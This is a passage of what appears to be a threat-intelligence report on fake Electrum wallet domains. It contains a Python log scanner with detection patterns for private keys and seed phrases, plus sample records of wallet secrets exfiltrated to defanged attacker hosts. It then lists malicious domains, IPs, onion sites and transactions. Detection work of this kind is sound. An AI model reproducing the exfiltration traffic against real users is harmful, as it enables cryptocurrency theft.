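PATTERNS = {
    "wif-private-key": re.compile(rf"\b(?:5{B58}{{50}}|[KL]{B58}{{51}})\b"),
    "xprv-extended-key": re.compile(rf"\bxprv{B58}{{107}}\b"),
    "seed-phrase": re.compile(r"\b(?:[a-z]{3,8}[ +]){11,23}[a-z]{3,8}\b"),
}
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

# Constructed sample records (one JSON object per line). Hosts are defanged.
SAMPLE_WIF = "5HpHagT65TZzG1PH3CSu63k8DbpvD8s5ip4nEB3kEsreAnchuDf"   # WIF-shaped sample, not a live key
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"src": "192.0.2.10", "method": "GET", "host": "38.128.66[.]3:4285",
     "uri": "/post/data=" + base64.b64encode(SAMPLE_WIF.encode()).decode(), "body": ""},
    {"src": "192.0.2.11", "method": "POST", "host": "electrumwalletbtc.hopto[.]org",
     "uri": "/time.php",
     "body": "s=witch+collapse+practice+feed+shame+open+despair+creek+road+again+ice+least&se="},
    {"src": "192.0.2.12", "method": "GET", "host": "electrum.org", "uri": "/#download", "body": ""},
    {"src": "192.0.2.13", "method": "POST", "host": "example.com", "uri": "/login",
     "body": "user=alice&pw=hunter2"},
])


def find_secrets(text):
    """Return the set of indicator names present in text, plain or base64-wrapped."""
    found = set()
    candidates = [text, unquote_plus(text)]           # '+' and %xx forms of the same payload
    for token in BASE64_RE.findall(text):
        try:
            decoded = base64.b64decode(token + "=" * (-len(token) % 4))
        except (binascii.Error, ValueError):
            continue
        candidates.append(decoded.decode("latin-1"))  # never fails; junk simply won't match
    for candidate in candidates:
        for name, pattern in PATTERNS.items():
            if pattern.search(candidate):
                found.add(name)
    return found


def scan_log(log_text):
    """One alert per (source, host, field, indicator) across the uri and body fields."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        for field in ("uri", "body"):
            for indicator in sorted(find_secrets(rec.get(field, ""))):
                alert = {"src": rec["src"], "host": rec["host"],
                         "field": field, "indicator": indicator}
                if alert not in alerts:
                    alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The patterns are deliberately shape-based rather than checksum-based: a Base58Check validation of the WIF would cut false positives further, but the exfiltration here is to a host that should never see wallet material at all, so the hit on the host plus the shape is already enough to act on.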

DNS Infrastructure

eiectrum[.]net, 185.222.202[.]108, AS204725 UVL2-ASN, UA
myelecrum[.]info, 185.222.202[.]108, AS204725 UVL2-ASN, UA
electrume[.]com, 185.222.202[.]108, AS204725 UVL2-ASN, UA
electrume[.]org, 185.222.202[.]108, AS204725 UVL2-ASN, UA
electrume[.]info, 185.222.202[.]108, AS204725 UVL2-ASN, UA
btc-electrum[.]com, 185.222.202[.]108, AS204725 UVL2-ASN, UA
electrumapp[.]org, 91.211.89[.]115, AS206638 HOSTFORY, UA
electrumbitcoin[.]org, 91.211.89[.]105, AS206638 HOSTFORY, UA
myelectrum[.]org, 91.211.89[.]112, AS206638 HOSTFORY, UA
electrumsecure[.]org, 93.171.158[.]14, AS201094 GMHOST, UA
electrum[.]vc, 93.171.158[.]14, AS201094 GMHOST, UA
electrumapp[.]com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumapps[.]net, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumbit[.]org, 93.171.158[.]14, AS206638 HOSTFORY, UA
electrumgit[.]com, 93.171.158[.]14, AS206638 HOSTFORY, UA
electrumgroup[.]net, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumsoft[.]net, 93.171.158[.]14, AS206638 HOSTFORY, UA
electrumversion[.]com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumreleases[.]org, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrum[.]sx, 91.211.89[.]100, AS206638 HOSTFORY, UA
eilectrum[.]org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
eliectrum[.]org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
ellectrium[.]org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
elliectrum[.]org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
get-electrum[.]net, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
get-electrum[.]pro, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
xn--eectrum-9hb[.]org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
xn--eletrum-45a[.]com, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
electrumapp[.]live, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumbch[.]com, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumdownloadserver[.]com, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumlite[.]com, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumlitecoin[.]com, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumn[.]com, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumsecuredownload[.]com, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrumx[.]org, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrunm[.]org, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
getelectrum[.]live, 38.111.114[.]7, AS62563 AS-GLOBALTELEHOST (GLOBALTELEHOST Corp.), CA
electrum[.]sx, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrumhub[.]com, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrumnet[.]com, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrumreleases[.]com, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrumsafe[.]org, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrumstart[.]org, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrumware[.]com, 170.130.175[.]154, AS49532 SERVERHUB-NL, DE
electrum[.]bz, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumcircle[.]com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumproject[.]org, 93.171.158[.]14, UA, 2019-03-14T01:07:36Z, AS201094 GMHOST, UA
electrumweb[.]net, 185.200.190[.]204, UA, 2017-11-30T02:49:16Z, AS42533 DCUA-AS, UA
electrumsource[.]org, 185.200.190[.]204, UA, 2017-11-30T02:49:16Z, AS42533 DCUA-AS, UA
electrumfix[.]com, 185.200.190[.]204, UA, 2019-02-12T20:05:56, AS42533 DCUA-AS, UA
electrumbase[.]net, 185.200.190[.]204, UA, 2019-02-12T20:06:06, AS42533 DCUA-AS, UA
electrumsite[.]com, 185.200.190[.]204, UA, 2019-02-12T20:03:03, AS42533 DCUA-AS, UA
electrumbuild[.]com, 185.200.190[.]204, UA, 2019-02-12T04:27:08, AS42533 DCUA-AS, UA
electrumcore[.]net, 185.200.190[.]204, UA, 2019-02-09T17:01:22, AS42533 DCUA-AS, UA
electrumapps[.]com, 185.200.190[.]204, UA, 2019-02-07T17:39:44, AS42533 DCUA-AS, UA
electrumbase[.]com, 185.200.190[.]204, UA, 2019-02-07T17:39:54, AS42533 DCUA-AS, UA
www.electrumclient[.]org, 185.200.190[.]204, UA, 2019-02-10T16:34:42, AS42533 DCUA-AS, UA
electrumofficial[.]com, 190.97.167[.]181, -, 2019-02-07T23:53:20, AS27956 Cyber Cast International, S.A.
carderstuff[.]pro, 190.97.167[.]181, -, 2018-11-01T13:00:55, AS27956 Cyber Cast International, S.A.
privatstuff[.]site, 190.97.167[.]181, -, -, AS27956 Cyber Cast International, S.A.
privatstuff[.]shop, 190.97.167[.]181, -, -, AS27956 Cyber Cast International, S.A.
electrumbase[.]org, 91.211.89[.]103, UA, 2019-02-06T20:20:41, AS206638 HOSTFORY, UA
electrumsafe[.]org, 91.211.89[.]103, UA, 2019-02-04T18:35:10, AS206638 HOSTFORY, UA
electrumware[.]org, 91.211.89[.]103, UA, 2019-02-06T20:20:02, AS206638 HOSTFORY, UA
electrumcore[.]com, 91.211.89[.]103, UA, 2019-02-07T02:57:10, AS206638 HOSTFORY, UA
electrumopen[.]org, 91.211.89[.]103, UA, 2019-02-06T20:20:22, AS206638 HOSTFORY, UA
electrumget[.]com, 170.130.175[.]154, DE, 2019-02-07T21:37:16, AS49532 SERVERHUB-NL, DE
electrumdownload[.]com, 91.211.89[.]107, UA, 2019-01-29T07:00:00, AS206638 HOSTFORY, UA
electrumdownload[.]org, 91.211.89[.]102, UA, 2019-02-04T18:30:03, AS206638 HOSTFORY, UA
goelectrum[.]com, 91.211.89[.]113, UA, 2019-01-29T07:00:00, AS206638 HOSTFORY, UA
getelectrum[.]com, 91.211.89[.]100, UA, 2019-01-29T07:00:00, AS206638 HOSTFORY, UA
electrumupgrade[.]org, 91.211.89[.]106, UA, 2019-01-29T19:57:55, AS206638 HOSTFORY, UA
electrumupdate[.]com, 91.211.89[.]101, UA, 2019-01-29T07:00:00, AS206638 HOSTFORY, UA
electrumpgrade[.]com, 107.161.23[.]204, US, 2019-01-29T07:00:00, AS3842 RAMNODE (RamNode LLC), US
electrumdownload[.]com, 91.211.89[.]107, UA, 2019-02-10T07:00:00, AS206638 HOSTFORY, UA
electrumbtc[.]org, 91.211.89[.]110, UA, 2019-01-29T19:57:55, AS206638 HOSTFORY, UA
downloadelectrum[.]org, 91.211.89[.]111, UA, 2019-01-29T19:57:55, AS206638 HOSTFORY, UA
downloadelectrum[.]com, 91.211.89[.]108, UA, 2019-01-29T07:00:00, AS206638 HOSTFORY, UA
btcelectrum[.]org, 91.211.89[.]109, UA, 2019-01-29T19:57:59, AS206638 HOSTFORY, UA
electrumware[.]org, 91.211.89[.]103, UA, 2019-02-06T20:20:02, AS206638 HOSTFORY, UA

Interaction with darknet market sites

Hydra: hydraruzxpnew4af[.]onion
Wall Street Market: wallstyizjhkrvmj[.]onion

Sample transactions of the BTC-to-XMR conversion on BitSquare

90321b6890622ea49011c22752011d019d451f61e60fe5b0b73fbf657790f62f
19d39108e709144980564d5c3e9ea193ef3e0f18b9fae19d2afe564bc8490ec4
38da16437b1507db8f48c68131031d1bcda7497d841f3267192b0dcbf8836e57
1af76520fe244174ebe1402e7e7a30182a207e8d02a91b8ed8922ad37299065d
d097233c97361dc09d91d676fcac75356dfef3ee407c525ea697b7f170f61434

Some of the large addresses

bc1qcla39fm0q8ka8th8ttpq0yxla30r430m4hgu3x